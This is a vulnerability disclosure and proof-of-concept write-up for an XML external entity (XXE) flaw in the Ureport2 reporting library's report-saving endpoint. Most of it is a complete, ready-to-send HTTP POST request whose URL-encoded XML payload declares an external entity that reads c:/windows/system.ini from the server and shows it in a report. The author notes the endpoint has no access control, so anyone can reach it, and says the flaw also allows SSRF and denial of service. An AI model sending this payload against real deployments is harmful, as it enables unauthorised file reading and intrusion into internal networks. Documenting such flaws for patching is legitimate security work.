Ureport2 XXE (Author: idam0n)

The report-saving interface does not disable external entity resolution when it parses the submitted XML. An attacker can therefore submit XML that declares external entities to read arbitrary files on the operating system, to reach internal hosts (SSRF) and enumerate intranet information, or to cause a denial of service by declaring a large number of recursively referenced entities.

The vulnerable code is in ureport2-core-2.2.9.jar, method com.bstek.ureport.parser.ReportParser.parse, shown in the screenshot: [image: ReportParser.parse]

The method reads the XML directly and the parser is not configured to prohibit external entity references, which results in XXE.

To reproduce, build a local environment: use IDEA to create a Spring Boot demo project and add ureport2 as a dependency:

[image: demo project setup]

Exploiting the Vulnerability

Save a report: [image: saving a report]

The HTTP message: [image: HTTP request]

Now add the XXE payload to the 'content' parameter of the POST request. The XML content with the payload: [image: XML with payload]

Submit the data; the HTTP message: [image: HTTP request with payload]

POST /ureport/designer/saveReportFile HTTP/1.1 Host: 192.168.66.39:8881 Content-Length: 3936 Accept: / Origin: http://192.168.66.39:8881 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.66.39:8881/ureport/designer Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=F988AAC7F0ED6210948EE2DB114A8A86 Connection: close

file=file%3Atets1.ureport.xml&content=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3C!DOCTYPE+x+%5B+%3C!ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fsystem.ini%22%3E%5D%3E%3Cureport%3E%3Ccell+expand%3D%22None%22+name%3D%22A1%22+row%3D%221%22+col%3D%221%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22B1%22+row%3D%221%22+col%3D%222%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22C1%22+row%3D%221%22+col%3D%223%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22D1%22+row%3D%221%22+col%3D%224%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22A2%22+row%3D%222%22+col%3D%221%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22B2%22+row%3D%222%22+col%3D%222%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22C2%22+row%3D%222%22+col%3D%223%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22D2%22+row%3D
%222%22+col%3D%224%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22A3%22+row%3D%223%22+col%3D%221%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22B3%22+row%3D%223%22+col%3D%222%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22C3%22+row%3D%223%22+col%3D%223%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22D3%22+row%3D%223%22+col%3D%224%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%26xxe%3B%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Crow+row-number%3D%221%22+height%3D%2218%22%2F%3E%3Crow+row-number%3D%222%22+height%3D%2218%22%2F%3E%3Crow+row-number%3D%223%22+height%3D%2218%22%2F%3E%3Ccolumn+col-number%3D%221%22+width%3D%2280%22%2F%3E%3Ccolumn+col-number%3D%222%22+width%3D%2280%22%2F%3E%3Ccolumn+col-number%3D%223%22+width%3D%2280%22%2F%3E%3Ccolumn+col-number%3D%224%22+width%3D%2280%22%2F%3E%3Cpaper+type%3D%22A4%22+left-margin%3D%2290%22+right-margin%3D%2290%22%0A++++top-margin%3D%2272%22+bottom-margin%3D%2272%22+paging-mode%3D%22fitpage%22+fixrows%3D%220%22%0A++++width%3D%22595%22+height%3D%22842%22+orientation%3D%22portrait%22+html-report-align%3D%22left%22+bg-image%3D%22%22+html-interval-refresh-value%3D%220%22+column-enabled%3D%22false%22%3E%3C%2Fpaper%3E%3C%2Fureport%3E

Now open the report: the content of c:/windows/system.ini is returned. [image: report showing file content]

It should also be noted that the function has no access control, so it can be reached by any user.

Furthermore, an XML External Entity (XXE) injection can also be used for SSRF and DoS. SSRF: [image: SSRF via XXE]